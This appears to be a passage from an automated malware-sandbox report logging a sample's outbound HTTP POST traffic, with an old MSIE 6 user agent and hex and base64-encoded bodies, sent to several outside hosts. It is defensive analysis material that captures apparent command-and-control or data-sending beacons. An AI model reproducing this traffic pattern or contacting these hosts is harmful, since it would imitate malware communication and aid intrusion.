o2c1Ng3+7nKUpIbQhAgQG8aJOsh7PohhkVe59JGhylv9bncuWCLnJHV1QQrF/Y8923ZNN40Z4S4OTrey8G54qM4v6HsNfRkUYrzjJs+Kdh+5M5FfEbTBDT67M2PL5f4+vWUtuWkN2glGlLpugj/t2FPrkpfXmqGQwdnRYh1WlRFO8RtYByGF+syQGPKjcjpaHzSwHWbfbD2QqJsO4VYlTAINNb5R101YxJHcizIJhHrmaAMWcAzomU5bXmDMEz+7McEoTbaapfRdSHHbjd00wz9o3JB84kCnUHmbZ0kXZnMJfGQp5PiHTnJAxgcmTre3w/wd0B7D9hHtibzq4WfVZZcLnhmmA27gFLF3IOW41+F3bTnvkCnDeSIXXLVFcp4vQEydRLF9jvqVOrIv/iLZ4YHjGZCkvM/qb/ZhF9YZJ/XZFTUXKqJNxZFM0V/ulwEUe+gx4V7TlzhupKOt5NozHaqbcu2WTGiUV+gh+s+U+D2ti6g4/m9s1ifQ17PUI3fwtJY9oraD72m2wlqiIy4qIipgb1BK2UKFm75FFc9Q1sCqfQ9CJuhthuJaICDlaFwD/0cxPapu30B7
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1835User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: agulatex.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 78 2f 2f 30 37 6f 73 63 77 33 4b 62 5a 37 49 72 34 73 68 4a 6c 2f 54 32 78 2b 50 52 61 52 31 6c 37 30 37 77 47 69 6d 74 6f 4b 47 54 65 4e 32 47 4d 2f 46 36 73 2b 62 56 79 41 70 2b 6b 5a 63 53 77 72 67 30 76 65 68 6c 69 41 47 31 58 58 49 34 42 2b 44 66 53 76 31 36 78 73 46 36 64 68 44 31 70 4c 65 45 77 38 72 47 57 30 30 71 38 31 43 6a 46 7a 67 42 65 6c 70 76 63 63 4d 2f 54 76 34 59 55 31 44 6f 4a 78 78 39 64 57 59 47 2f 33 70 6a 50 66 6b 6a 4d 70 6b 46 7a 2f 76 52 4d 64 70 6e 30 73 59 4b 38 5a 4e 68 45 4a 77 47 6c 56 51 42 58 6a 4e 74 77 67 68 52 62 6c 6a 33 4b 37 53 44 70 56 6f 36 52 35 38 70 69 4a 69 76 6c 57 6d 35 59 6d 67 2b 6e 6d 48 67 58 68 73 4e 67 32 38 56 34 77 64 51 50 30 62 51 34 64 35 61 39 39 69 65 6d 4a 65 6d 30 70 65 35 6b 30 65 4e 51 55 73 30 33 74 2b 71 41 77 59 6f 71 44 66 6b 65 6c 32 35 6d 4d 4f 58 52 31 34 53 71 33 72 50 30 2f 47 58 6a 32 47 79 7a 67 4d 43 69 4b 78 4e 30 6b 50 49 75 7a 4c 6a 6a 34 7a 79 6e 44 64 52 49 5a 68 65 49 78 37 52 36 78 33 35 48 49 42 76 6a 49 55 7a 4c 65 6a 30 6a 33 59 5a 6a 75 76 33 54 50 32 58 4a 6f 78 44 62 37 4c 31 43 30 31 4d 43 35 78 45 6a 74 66 44 6e 43 41 46 62 6c 61 6b 77 2f 54 57 61 72 4f 74 6f 75 30 2f 6c 37 5a 72 73 44 46 63 63 4d 39 58 72 57 4d 64 34 55 74 47 53 46 49 34 61 36 62 37 79 64 50 4f 57 32 4a 6a 44 43 6d 4e 4c 77 53 47 65 54 6d 45 41 58 33 74 68 77 33 36 31 4c 61 7a 68 4f 46 6f 6e 36 51 75 53 78 44 6d 38 73 66 45 6e 66 6d 76 73 52 47 52 73 31 35 4f 65 70 7a 55 69 46 77 4d 4d 46 70 69 70 6a 6a 69 4a 6c 6d 4a 71 46 44 34 48 53 4b 36 64 75 48 72 43 39 33 4c 65 33 2f 48 4c 68 50 47 4d 6a 31 42 6f 6f 53 77 64 35 64 76 56 52 42 62 4e 34 54 55 32 72 73 51 62 6e 58 4d 78 6c 37 6d 4d 41 35 72 6b 70 50 6b 4b 38 50 79 35 70 51 39 4a 5a 7a 4f 7a 44 70 37 59 30 34 62 75 6c 32 79 68 50 78 6c 4c 37 41 63 Data Ascii: x//07oscw3KbZ7Ir4shJl/T2x+PRaR1l707wGimtoKGTeN2GM/F6s+bVyAp+kZcSwrg0vehliAG1XXI4B+DfSv16xsF6dhD1pLeEw8rGW00q81CjFzgBelpvccM/Tv4YU1DoJxx9dWYG/3pjPfkjMpkFz/vRMdpn0sYK8ZNhEJwGlVQBXjNtwghRblj3K7SDpVo6R58piJivlWm5Ymg+nmHgXhsNg28V4wdQP0bQ4d5a99iemJem0pe5k0eNQUs03t+qAwYoqDfkel25mMOXR14Sq3rP0/GXj2GyzgMCiKxN0kPIuzLjj4zynDdRIZheIx7R6x35HIBvjIUzLej0j3YZjuv3TP2XJoxDb7L1C01MC5xEjtfDnCAFblakw/TWarOtou0/l7ZrsDFccM9XrWMd4UtGSFI4a6b7ydPOW2JjDCmNLwSGeTmEAX3thw361LazhOFon6QuSxDm8sfEnfmvsRGRs15OepzUiFwMMFpipjjiJlmJqFD4HSK6duHrC93Le3/HLhPGMj1BooSwd5dvVRBbN4TU2rsQbnXMxl7mMA5rkpPkK8Py5pQ9JZzOzDp7Y04bul2yhPxlL7Ac
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 75 6e 75 71 47 48 49 49 37 6e 4a 6c 78 79 50 5a 70 63 30 45 76 58 57 32 62 4d 68 43 50 53 35 5a 78 6c 31 4d 6a 57 61 79 38 4b 70 63 59 63 4a 49 76 6f 41 49 48 53 53 4c 70 6d 35 51 31 4f 35 57 79 48 50 76 6e 6b 44 64 30 4f 61 35 72 39 2f 73 6b 33 54 2f 4e 39 31 76 38 47 6e 4f 57 34 6b 47 67 2f 75 53 53 30 5a 32 62 67 51 31 79 4a 4d 4f 76 48 61 4e 48 6f 56 62 6b 57 7a 79 47 44 43 4f 64 42 57 48 70 78 6e 31 4b 6f 57 30 6a 46 7a 6d 4f 36 6b 47 43 4f 4a 36 70 57 74 37 4c 72 45 79 67 44 68 7a 7a 4d 2b 4b 37 41 45 46 74 37 4a 4f 56 31 36 65 2f 34 63 4b 5a 33 43 2f 5a 2b 77 75 73 69 4b 76 6b 62 4d 6c 55 4f 75 48 66 34 4b 35 53 57 65 2b 64 74 44 49 6a 69 44 46 75 30 46 54 4a 63 67 2b 77 6d 47 2b 32 51 57 42 47 64 4f 49 42 74 46 2b 68 6f 2f 6e 69 35 34 49 6a 48 74 70 30 49 34 72 6f 31 43 79 33 61 78 69 76 47 59 61 6f 49 66 6d 47 67 34 4c 42 42 6c 47 51 31 6c 79 77 50 59 33 58 6e 54 34 62 43 63 34 51 57 64 30 36 5a 57 71 75 75 4b 67 76 30 6f 46 6a 67 46 50 43 6b 33 78 39 64 49 6a 35 7a 68 50 4f 35 34 72 32 2b 75 70 6a 66 63 75 6b 57 7a 50 79 32 4f 48 58 47 74 67 53 45 70 6c 67 6b 74 75 45 50 4d 67 30 46 50 34 45 38 2f 2f 2f 58 49 63 59 4e 42 4d 72 37 46 72 73 2f 63 52 2b 78 37 70 76 44 6b 47 6b 54 33 48 75 76 39 70 74 2f 71 4b 57 73 52 58 50 59 36 66 4b 37 79 4d 74 62 39 33 66 49 71 30 2f 74 51 4d 36 49 68 41 6c 53 4e 52 4b 46 63 76 49 59 70 77 36 65 74 2b 2f 4e 66 78 50 33 77 58 62 53 65 70 59 57 56 54 44 5a 78 33 4c 32 4d 6d 32 49 35 57 4d 57 6a 64 37 61 5a 2f 43 4b 6a 65 41 42 67 78 6d 38 39 6c 69 68 57 73 77 66 6d 66 37 37 76 5a 76 37 73 46 6d 4a 62 2b 76 7a 59 58 42 4c 79 5a 4e 53 39 41 46 74 2f 76 49 67 38 6e 41 71 77 72 65 6a 59 33 37 6a 5a 4c 6b 65 47 68 45 79 63 65 70 2b 36 31 49 43 4c 49 49 74 52 39 Data Ascii: unuqGHII7nJlxyPZpc0EvXW2bMhCPS5Zxl1MjWay8KpcYcJIvoAIHSSLpm5Q1O5WyHPvnkDd0Oa5r9/sk3T/N91v8GnOW4kGg/uSS0Z2bgQ1yJMOvHaNHoVbkWzyGDCOdBWHpxn1KoW0jFzmO6kGCOJ6pWt7LrEygDhzzM+K7AEFt7JOV16e/4cKZ3C/Z+wusiKvkbMlUOuHf4K5SWe+dtDIjiDFu0FTJcg+wmG+2QWBGdOIBtF+ho/ni54IjHtp0I4ro1Cy3axivGYaoIfmGg4LBBlGQ1lywPY3XnT4bCc4QWd06ZWquuKgv0oFjgFPCk3x9dIj5zhPO54r2+upjfcukWzPy2OHXGtgSEplgktuEPMg0FP4E8///XIcYNBMr7Frs/cR+x7pvDkGkT3Huv9pt/qKWsRXPY6fK7yMtb93fIq0/tQM6IhAlSNRKFcvIYpw6et+/NfxP3wXbSepYWVTDZx3L2Mm2I5WMWjd7aZ/CKjeABgxm89lihWswfmf77vZv7sFmJb+vzYXBLyZNS9AFt/vIg8nAqwrejY37jZLkeGhEycep+61ICLIItR9
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 4d 42 76 54 47 51 67 53 37 6e 4b 6c 75 35 33 35 53 77 31 39 73 48 76 79 74 46 36 51 72 56 6d 66 76 47 58 65 59 2b 73 58 42 32 65 33 64 76 2f 63 45 77 36 59 62 58 45 45 44 59 66 51 73 4a 52 71 69 31 57 32 79 39 65 78 41 48 45 2f 42 5a 77 68 57 39 58 69 41 4f 4c 39 79 59 2f 36 49 31 55 48 64 64 38 35 71 33 34 54 35 6e 55 51 6a 69 66 4f 48 74 6f 38 33 70 7a 65 57 34 62 62 58 4d 5a 30 54 76 56 6d 58 78 6f 4b 6d 72 66 33 6d 43 56 4c 74 6f 53 6a 65 79 6e 76 68 56 79 6e 74 42 6b 32 4f 76 36 65 79 6b 41 62 50 4f 63 49 47 41 50 36 77 65 55 2b 64 58 79 42 6c 7a 52 59 7a 59 55 73 63 6b 4a 49 30 31 52 42 61 59 73 37 47 77 65 35 49 52 4a 39 33 67 78 4d 58 2f 52 32 30 4f 76 33 7a 34 4a 59 32 71 47 37 73 67 7a 31 42 54 7a 69 47 75 6a 44 67 6c 34 62 51 73 63 36 79 53 59 59 73 4d 5a 4a 79 4e 37 42 59 44 50 4c 32 4b 70 74 30 36 39 4e 36 50 30 36 43 6f 36 59 68 70 61 37 4f 41 38 52 2f 69 4b 46 42 79 43 52 56 54 31 65 78 54 53 47 59 4a 34 31 64 4f 6d 50 52 4c 4c 42 53 49 37 51 49 36 54 56 2b 64 6e 4e 64 54 71 69 32 45 46 79 2f 6e 41 55 50 33 30 70 55 45 54 63 78 45 46 4e 43 33 70 61 31 76 6f 5a 67 47 43 66 34 61 55 64 39 4a 32 42 37 50 45 4b 6a 6f 2f 5a 2b 4c 6e 36 72 4b 37 61 39 6b 61 67 4b 64 43 66 78 63 50 68 72 49 64 42 4c 6f 2f 65 48 30 43 66 36 6d 49 64 73 33 71 45 6f 4b 61 47 2b 35 67 51 6c 37 6f 77 6e 6a 68 55 6b 65 48 7a 6e 68 50 55 68 6f 39 51 78 49 49 71 54 72 52 42 43 6d 4d 55 72 75 42 41 64 54 2b 56 4b 50 68 50 47 30 45 6f 71 74 61 4b 49 58 50 37 7a 58 46 38 57 6a 78 46 4c 66 67 58 68 52 70 33 34 62 48 72 70 76 47 50 46 79 4e 73 42 6a 58 44 35 49 4b 64 2b 4f 47 72 4d 36 6b 55 34 55 4d 4d 66 34 75 6f 4c 75 49 34 75 61 57 47 54 50 6c 48 66 7a 51 7a 41 76 39 49 55 43 6f 3d Data Ascii: MBvTGQgS7nKlu535Sw19sHvytF6QrVmfvGXeY+sXB2e3dv/cEw6YbXEEDYfQsJRqi1W2y9exAHE/BZwhW9XiAOL9yY/6I1UHdd85q34T5nUQjifOHto83pzeW4bbXMZ0TvVmXxoKmrf3mCVLtoSjeynvhVyntBk2Ov6eykAbPOcIGAP6weU+dXyBlzRYzYUsckJI01RBaYs7Gwe5IRJ93gxMX/R20Ov3z4JY2qG7sgz1BTziGujDgl4bQsc6ySYYsMZJyN7BYDPL2Kpt069N6P06Co6Yhpa7OA8R/iKFByCRVT1exTSGYJ41dOmPRLLBSI7QI6TV+dnNdTqi2EFy/nAUP30pUETcxEFNC3pa1voZgGCf4aUd9J2B7PEKjo/Z+Ln6rK7a9kagKdCfxcPhrIdBLo/eH0Cf6mIds3qEoKaG+5gQl7ownjhUkeHznhPUho9QxIIqTrRBCmMUruBAdT+VKPhPG0EoqtaKIXP7zXF8WjxFLfgXhRp34bHrpvGPFyNsBjXD5IKd+OGrM6kU4UMMf4uoLuI4uaWGTPlHfzQzAv9IUCo=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 6f 32 63 31 4e 67 33 2b 37 6e 4b 55 70 49 62 51 68 41 67 51 47 38 61 4a 4f 73 68 37 50 6f 68 68 6b 56 65 35 39 4a 47 68 79 6c 76 39 62 6e 63 75 57 43 4c 6e 4a 48 56 31 51 51 72 46 2f 59 38 39 32 33 5a 4e 4e 34 30 5a 34 53 34 4f 54 72 65 79 38 47 35 34 71 4d 34 76 36 48 73 4e 66 52 6b 55 59 72 7a 6a 4a 73 2b 4b 64 68 2b 35 4d 35 46 66 45 62 54 42 44 54 36 37 4d 32 50 4c 35 66 34 2b 76 57 55 74 75 57 6b 4e 32 67 6c 47 6c 4c 70 75 67 6a 2f 74 32 46 50 72 6b 70 66 58 6d 71 47 51 77 64 6e 52 59 68 31 57 6c 52 46 4f 38 52 74 59 42 79 47 46 2b 73 79 51 47 50 4b 6a 63 6a 70 61 48 7a 53 77 48 57 62 66 62 44 32 51 71 4a 73 4f 34 56 59 6c 54 41 49 4e 4e 62 35 52 31 30 31 59 78 4a 48 63 69 7a 49 4a 68 48 72 6d 61 41 4d 57 63 41 7a 6f 6d 55 35 62 58 6d 44 4d 45 7a 2b 37 4d 63 45 6f 54 62 61 61 70 66 52 64 53 48 48 62 6a 64 30 30 77 7a 39 6f 33 4a 42 38 34 6b 43 6e 55 48 6d 62 5a 30 6b 58 5a 6e 4d 4a 66 47 51 70 35 50 69 48 54 6e 4a 41 78 67 63 6d 54 72 65 33 77 2f 77 64 30 42 37 44 39 68 48 74 69 62 7a 71 34 57 66 56 5a 5a 63 4c 6e 68 6d 6d 41 32 37 67 46 4c 46 33 49 4f 57 34 31 2b 46 33 62 54 6e 76 6b 43 6e 44 65 53 49 58 58 4c 56 46 63 70 34 76 51 45 79 64 52 4c 46 39 6a 76 71 56 4f 72 49 76 2f 69 4c 5a 34 59 48 6a 47 5a 43 6b 76 4d 2f 71 62 2f 5a 68 46 39 59 5a 4a 2f 58 5a 46 54 55 58 4b 71 4a 4e 78 5a 46 4d 30 56 2f 75 6c 77 45 55 65 2b 67 78 34 56 37 54 6c 7a 68 75 70 4b 4f 74 35 4e 6f 7a 48 61 71 62 63 75 32 57 54 47 69 55 56 2b 67 68 2b 73 2b 55 2b 44 32 74 69 36 67 34 2f 6d 39 73 31 69 66 51 31 37 50 55 49 33 66 77 74 4a 59 39 6f 72 61 44 37 32 6d 32 77 6c 71 69 49 79 34 71 49 69 70 67 62 31 42 4b 32 55 4b 46 6d 37 35 46 46 63 39 51 31 73 43 71 66 51 39 43 4a 75 68 74 68 75 4a 61 49 43 44 6c 61 46 77 44 2f 30 63 78 50 61 70 75 33 30 42 37 Data Ascii: o2c1Ng3+7nKUpIbQhAgQG8aJOsh7PohhkVe59JGhylv9bncuWCLnJHV1QQrF/Y8923ZNN40Z4S4OTrey8G54qM4v6HsNfRkUYrzjJs+Kdh+5M5FfEbTBDT67M2PL5f4+vWUtuWkN2glGlLpugj/t2FPrkpfXmqGQwdnRYh1WlRFO8RtYByGF+syQGPKjcjpaHzSwHWbfbD2QqJsO4VYlTAINNb5R101YxJHcizIJhHrmaAMWcAzomU5bXmDMEz+7McEoTbaapfRdSHHbjd00wz9o3JB84kCnUHmbZ0kXZnMJfGQp5PiHTnJAxgcmTre3w/wd0B7D9hHtibzq4WfVZZcLnhmmA27gFLF3IOW41+F3bTnvkCnDeSIXXLVFcp4vQEydRLF9jvqVOrIv/iLZ4YHjGZCkvM/qb/ZhF9YZJ/XZFTUXKqJNxZFM0V/ulwEUe+gx4V7TlzhupKOt5NozHaqbcu2WTGiUV+gh+s+U+D2ti6g4/m9s1ifQ17PUI3fwtJY9oraD72m2wlqiIy4qIipgb1BK2UKFm75FFc9Q1sCqfQ9CJuhthuJaICDlaFwD/0cxPapu30B7
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 64 59 32 45 38 64 43 68 6e 79 68 72 47 77 38 45 59 77 70 54 74 49 4f 35 57 49 7a 34 4c 46 67 48 42 41 36 32 67 2b 39 2f 49 55 73 54 7a 6d 56 4d 33 30 72 52 47 68 6b 43 78 33 4b 52 43 77 2f 56 66 75 64 49 75 63 73 49 45 4c 39 63 32 4d 56 4a 2f 44 4d 77 33 6d 42 37 51 43 6f 73 4b 6c 30 72 54 7a 53 42 47 76 53 35 54 45 32 51 39 48 6c 2f 62 72 30 43 47 33 33 4c 37 4c 6d 49 78 68 66 53 75 76 49 63 78 42 6e 6d 76 2b 33 57 78 35 33 30 47 36 43 36 78 57 39 37 51 31 45 56 34 59 30 61 43 62 36 44 38 7a 37 5a 5a 33 4b 76 6f 64 63 49 54 73 75 58 48 2f 66 73 46 51 6c 75 34 51 50 63 46 2f 6e 33 72 55 54 79 57 6a 65 4c 59 41 43 56 37 55 30 5a 6d 73 4e 54 79 69 2f 6f 4e 4f 4e 52 6e 42 30 67 30 7a 41 57 6d 32 7a 61 38 31 50 6c 6e 75 6c 63 49 33 32 39 38 33 38 50 7a 4b 42 31 39 51 6e 4e 43 62 4f 68 38 6c 66 6e 34 35 33 71 5a 78 73 6c 38 31 74 50 6d 33 36 67 63 46 76 39 61 64 57 61 4d 4a 37 50 30 6c 4d 39 53 49 57 67 52 79 33 6a 75 62 52 43 30 6c 31 50 71 4b 48 7a 75 35 5a 2f 72 45 75 4f 2b 4c 49 6c 4e 55 6c 2b 49 4a 4c 35 31 6b 32 6c 53 46 4d 55 33 43 50 67 65 6b 67 50 4d 49 4d 7a 6c 36 35 63 67 70 61 59 48 7a 46 54 52 55 4e 6c 55 41 6a 6b 35 38 30 2f 75 33 61 56 45 34 46 30 4f 75 7a 47 38 4e 32 7a 50 47 46 37 51 38 6d 43 41 67 48 70 68 5a 49 67 54 45 6d 49 2f 35 49 2b 4d 71 53 78 78 76 31 34 53 66 38 59 6f 44 79 4c 70 48 6b 79 32 36 78 58 55 36 78 46 72 56 48 4b 49 4a 74 5a 32 45 4f 39 30 4d 71 76 75 6a 4f 33 58 45 55 76 66 48 43 41 6f 65 4c 6f 51 5a 56 5a 4d 67 7a 6c 65 53 63 58 4e 49 6e 78 53 37 7a 5a 77 70 74 71 78 7a 55 58 2b 46 6f 6f 74 49 4a 57 34 72 2f 66 6b 30 4d 4e Data Ascii: dY2E8dChnyhrGw8EYwpTtIO5WIz4LFgHBA62g+9/IUsTzmVM30rRGhkCx3KRCw/VfudIucsIEL9c2MVJ/DMw3mB7QCosKl0rTzSBGvS5TE2Q9Hl/br0CG33L7LmIxhfSuvIcxBnmv+3Wx530G6C6xW97Q1EV4Y0aCb6D8z7ZZ3KvodcITsuXH/fsFQlu4QPcF/n3rUTyWjeLYACV7U0ZmsNTyi/oNONRnB0g0zAWm2za81PlnulcI329838PzKB19QnNCbOh8lfn453qZxsl81tPm36gcFv9adWaMJ7P0lM9SIWgRy3jubRC0l1PqKHzu5Z/rEuO+LIlNUl+IJL51k2lSFMU3CPgekgPMIMzl65cgpaYHzFTRUNlUAjk580/u3aVE4F0OuzG8N2zPGF7Q8mCAgHphZIgTEmI/5I+MqSxxv14Sf8YoDyLpHky26xXU6xFrVHKIJtZ2EO90MqvujO3XEUvfHCAoeLoQZVZMgzleScXNInxS7zZwptqxzUX+FootIJW4r/fk0MN
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 68User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: absblast.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 58 69 72 79 36 45 4d 54 62 6a 72 7a 37 45 4d 55 63 6f 76 33 42 49 51 59 66 6f 77 34 43 4b 53 61 68 71 79 36 44 4c 54 61 69 72 79 36 45 4d 54 62 6a 72 7a 37 46 4d 55 63 6a 73 30 37 46 4e 55 63 6b 74 31 38 Data Ascii: Xiry6EMTbjrz7EMUcov3BIQYfow4CKSahqy6DLTairy6EMTbjrz7FMUcjs07FNUckt18
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 304User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: host.doConnection: Keep-AliveCache-Control: no-cacheData Raw: 43 4f 58 67 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 42 4b 54 63 6c 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 38 49 52 61 6a 74 32 43 4e 69 42 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 52 61 6a 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 38 48 51 5a 69 73 31 41 4a 53 61 6a 74 33 4a 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 38 48 51 5a 69 73 31 42 4b 54 63 6c 76 34 44 4d 56 65 6f 77 36 46 4f 57 66 70 79 37 47 50 59 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 31 41 4b 54 63 6d 77 35 46 4f 57 67 71 7a 39 49 52 61 6b 78 36 46 4f 58 67 71 7a 51 61 6a 74 32 42 4b 54 64 6d 77 35 46 4f 57 66 70 79 37 47 51 5a 69 73 31 41 4a 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 Data Ascii: COXgs1AJSbku3CLUdmw5ENWfpz8HQZis1AJSbkv4DMVeox6FOXgqz8HQZis1BKTclw5ENWfpy7GPYhr09IRajt8IRajt2CNiBLUdmw5ENWfpy7GRaju3CLUdmw5ENWfpy8HQZis1AJSajt3JUdmw5ENWfpy7GPYhr08HQZis1BKTclv4DMVeow6FOWfpy7GPYis1AJSbku3CLUdmw5ENWfpy7GPYhr1AKTcmw5FOWgqz9IRakx6FOXgqzQajt2BKTdmw5FOWfpy7GQZis1AJVeox6FOXgqz8HQZis1AJSbku3CLU
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1412User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: tcpoa.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 75 6e 75 71 47 48 49 49 37 6e 4a 6c 78 79 50 5a 70 63 30 45 76 58 57 32 62 4d 68 43 50 53 35 5a 78 6c 31 4d 6a 57 61 79 38 4b 70 63 59 63 4a 49 76 6f 41 49 48 53 53 4c 70 6d 35 51 31 4f 35 57 79 48 50 76 6e 6b 44 64 30 4f 61 35 72 39 2f 73 6b 33 54 2f 4e 39 31 76 38 47 6e 4f 57 34 6b 47 67 2f 75 53 53 30 5a 32 62 67 51 31 79 4a 4d 4f 76 48 61 4e 48 6f 56 62 6b 57 7a 79 47 44 43 4f 64 42 57 48 70 78 6e 31 4b 6f 57 30 6a 46 7a 6d 4f 36 6b 47 43 4f 4a 36 70 57 74 37 4c 72 45 79 67 44 68 7a 7a 4d 2b 4b 37 41 45 46 74 37 4a 4f 56 31 36 65 2f 34 63 4b 5a 33 43 2f 5a 2b 77 75 73 69 4b 76 6b 62 4d 6c 55 4f 75 48 66 34 4b 35 53 57 65 2b 64 74 44 49 6a 69 44 46 75 30 46 54 4a 63 67 2b 77 6d 47 2b 32 51 57 42 47 64 4f 49 42 74 46 2b 68 6f 2f 6e 69 35 34 49 6a 48 74 70 30 49 34 72 6f 31 43 79 33 61 78 69 76 47 59 61 6f 49 66 6d 47 67 34 4c 42 42 6c 47 51 31 6c 79 77 50 59 33 58 6e 54 34 62 43 63 34 51 57 64 30 36 5a 57 71 75 75 4b 67 76 30 6f 46 6a 67 46 50 43 6b 33 78 39 64 49 6a 35 7a 68 50 4f 35 34 72 32 2b 75 70 6a 66 63 75 6b 57 7a 50 79 32 4f 48 58 47 74 67 53 45 70 6c 67 6b 74 75 45 50 4d 67 30 46 50 34 45 38 2f 2f 2f 58 49 63 59 4e 42 4d 72 37 46 72 73 2f 63 52 2b 78 37 70 76 44 6b 47 6b 54 33 48 75 76 39 70 74 2f 71 4b 57 73 52 58 50 59 36 66 4b 37 79 4d 74 62 39 33 66 49 71 30 2f 74 51 4d 36 49 68 41 6c 53 4e 52 4b 46 63 76 49 59 70 77 36 65 74 2b 2f 4e 66 78 50 33 77 58 62 53 65 70 59 57 56 54 44 5a 78 33 4c 32 4d 6d 32 49 35 57 4d 57 6a 64 37 61 5a 2f 43 4b 6a 65 41 42 67 78 6d 38 39 6c 69 68 57 73 77 66 6d 66 37 37 76 5a 76 37 73 46 6d 4a 62 2b 76 7a 59 58 42 4c 79 5a 4e 53 39 41 46 74 2f 76 49 67 38 6e 41 71 77 72 65 6a 59 33 37 6a 5a 4c 6b 65 47 68 45 79 63 65 70 2b 36 31 49 43 4c 49 49 74 52 39 Data Ascii: unuqGHII7nJlxyPZpc0EvXW2bMhCPS5Zxl1MjWay8KpcYcJIvoAIHSSLpm5Q1O5WyHPvnkDd0Oa5r9/sk3T/N91v8GnOW4kGg/uSS0Z2bgQ1yJMOvHaNHoVbkWzyGDCOdBWHpxn1KoW0jFzmO6kGCOJ6pWt7LrEygDhzzM+K7AEFt7JOV16e/4cKZ3C/Z+wusiKvkbMlUOuHf4K5SWe+dtDIjiDFu0FTJcg+wmG+2QWBGdOIBtF+ho/ni54IjHtp0I4ro1Cy3axivGYaoIfmGg4LBBlGQ1lywPY3XnT4bCc4QWd06ZWquuKgv0oFjgFPCk3x9dIj5zhPO54r2+upjfcukWzPy2OHXGtgSEplgktuEPMg0FP4E8///XIcYNBMr7Frs/cR+x7pvDkGkT3Huv9pt/qKWsRXPY6fK7yMtb93fIq0/tQM6IhAlSNRKFcvIYpw6et+/NfxP3wXbSepYWVTDZx3L2Mm2I5WMWjd7aZ/CKjeABgxm89lihWswfmf77vZv7sFmJb+vzYXBLyZNS9AFt/vIg8nAqwrejY37jZLkeGhEycep+61ICLIItR9
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 64 59 32 45 38 64 43 68 6e 79 68 72 47 77 38 45 59 77 70 54 74 49 4f 35 57 49 7a 34 4c 46 67 48 42 41 36 32 67 2b 39 2f 49 55 73 54 7a 6d 56 4d 33 30 72 52 47 68 6b 43 78 33 4b 52 43 77 2f 56 66 75 64 49 75 63 73 49 45 4c 39 63 32 4d 56 4a 2f 44 4d 77 33 6d 42 37 51 43 6f 73 4b 6c 30 72 54 7a 53 42 47 76 53 35 54 45 32 51 39 48 6c 2f 62 72 30 43 47 33 33 4c 37 4c 6d 49 78 68 66 53 75 76 49 63 78 42 6e 6d 76 2b 33 57 78 35 33 30 47 36 43 36 78 57 39 37 51 31 45 56 34 59 30 61 43 62 36 44 38 7a 37 5a 5a 33 4b 76 6f 64 63 49 54 73 75 58 48 2f 66 73 46 51 6c 75 34 51 50 63 46 2f 6e 33 72 55 54 79 57 6a 65 4c 59 41 43 56 37 55 30 5a 6d 73 4e 54 79 69 2f 6f 4e 4f 4e 52 6e 42 30 67 30 7a 41 57 6d 32 7a 61 38 31 50 6c 6e 75 6c 63 49 33 32 39 38 33 38 50 7a 4b 42 31 39 51 6e 4e 43 62 4f 68 38 6c 66 6e 34 35 33 71 5a 78 73 6c 38 31 74 50 6d 33 36 67 63 46 76 39 61 64 57 61 4d 4a 37 50 30 6c 4d 39 53 